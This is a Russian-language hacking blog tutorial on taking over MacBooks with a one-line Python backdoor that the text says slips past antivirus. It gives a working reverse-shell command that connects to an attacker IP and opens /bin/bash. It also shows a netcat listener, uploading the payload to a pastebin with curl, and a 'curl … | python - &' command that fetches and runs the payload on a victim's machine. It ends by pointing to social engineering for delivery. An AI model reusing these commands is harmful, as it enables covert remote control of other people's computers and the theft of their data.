Как использовать одну команду Python для обхода антивирусного программного обеспечения за 5 секунд — Information Security Squad

Как использовать одну команду Python для обхода антивирусного программного обеспечения за 5 секунд

Заблуждение о том, что macOS более безопасно, чем операционная система Windows, далека от истины.

С помощью только одной небольшой команды хакер может полностью захватить MacBook и управлять им удаленно.

Огромный объем компьютеров Windows, которые в настоящее время работают во всем мире, взламывает их как прибыльное предприятие для разработчиков вредоносных программ и охотников за ошибками, которые хотят получить наличные деньги в Windows 10 zero-day эксплойтами.

Таким образом, есть много новостей, связанных с эксплуатацией Windows 10, хотя macOS может быть столь же уязвим.

Когда дело доходит до Mac pwning, однострочные полезные нагрузки просто создают подключение к MacBook, что позволяет злоумышленнику выполнять команды удаленно.

Опытный Python-кодер может легко составить сложный скрипт для фильтрации конфиденциальных данных, записи звука через микрофон в реальном времени, потока рабочего стола и шпиона на цель или автоматического выполнения множества пост-эксплуатационных атак.

Для этой новой мини-серии в нашей коллекции Hacking macOS я буду использовать несколько команд с одним слоем для взлома macOS.

Вот только одна команда, способная создавать бэкдор и уклоняться от антивирусного программного обеспечения в процессе:

 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); 

Эта команда Python не будет отмечена как злоумышленная или подозрительная с помощью брандмауэра macOS (с включенным «Блокировать все входящие подключения») или антивирусами, такими как AVG и Avast, поскольку Python не является вирусом.

Python — одна из нескольких технологий, встроенных в операционную систему macOS, которой злоупотребляют, подобно тому, как хакеры злоупотребляют PowerShell, законным инструментом, предназначенным для администраторов Windows.

Команда Python немного длинна, поэтому я покажу, как работать с длинными командами и сложными полезными нагрузками в реальном взломе с вымышленным примером того, как это может работать в реальном мире.

Запустить сервер Netcat

Настройте Netcat (nc) для прослушивания (-l) для новых входящих соединений на порту (-p) 8080.

Netcat начнет прослушивать каждый доступный интерфейс.

 nc -l-p 8080 

Сохранить полезную нагрузку

Затем сохраните приведенный ниже код Python как файл с именем payload.py.

Это можно сделать с помощью nano или предпочтительного текстового редактора.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Если команда запущена на удаленном MacBook, где используется виртуальный частный сервер (VPS), обязательно измените IP-адрес злоумышленника (1.2.3.4) на IP-адрес сервера.

Для локальных сетей, где система злоумышленника находится в той же сети Wi-Fi, что и MacBook, Netcat будет доступен с использованием локального IP-адреса злоумышленника (например, 192.168.1.18).

Номер порта (8080) можно изменить на любое расстояние между 1024 и 65535.

Загрузите полезную нагрузку в Pastebin

Загрузите код Python в Pastebin. Я предпочитаю Pb, основанный на командной строке Pastebin, потому что доменное имя очень короткое, и оно имеет возможность вручную называть вставки.

Например, если бы я захотел загрузить скрипт Python, я бы использовал приведенную ниже команду cURL.

 pastecat payload.py | curl -F c=@- https://ptpb.pw/~PasteNameHere

Здесь я использую cat для чтения файла Python и направления его (|) в команду cURL, которая берет данные (-F c = @ -) и отправляет их на сервер pb с URI «PasteNameHere».

Затем Pastebin распечатает данные в терминале, подтверждающие создание вставки.

cat payload.py | curl -F c=@- https://ptpb.pw/~PasteNameHere

digest: a1a045f5546347f5cbf0181328ce4d77550f6ff7
label: ~PasteNameHere
long: AKGgRfVUY0f1y_AYEyjOTXdVD2_3
short: D2_3
size: 7938
status: created
url: https://ptpb.pw/~PasteNameHere
uuid: xxxxxxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

Простое посещение URL-адреса теперь из любого веб-браузера покажет полезную нагрузку Python. Название вставки  может быть любым.

Если бы я хотел создать вставку, используя мое имя пользователя, я бы использовал следующую команду.

 cat payload.py | curl -F c=@- https://ptpb.pw/~tokyoneon 

Взломать все макбуки

Отсюда, любой MacBook можно взломать, используя команду ниже.

Это довольно простая команда для фиксации памяти.

Команда cURL загрузит вставку (stager), содержащую код Python, и выполнит фоновый процесс.

 curl ptpb.pw/~tokyoneon | python - & 

Социальная инженерия

Реальная проблема — это социальный аспект атаки, который необходим для отправки пэйлоада

 

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

5e7fa976b0640d40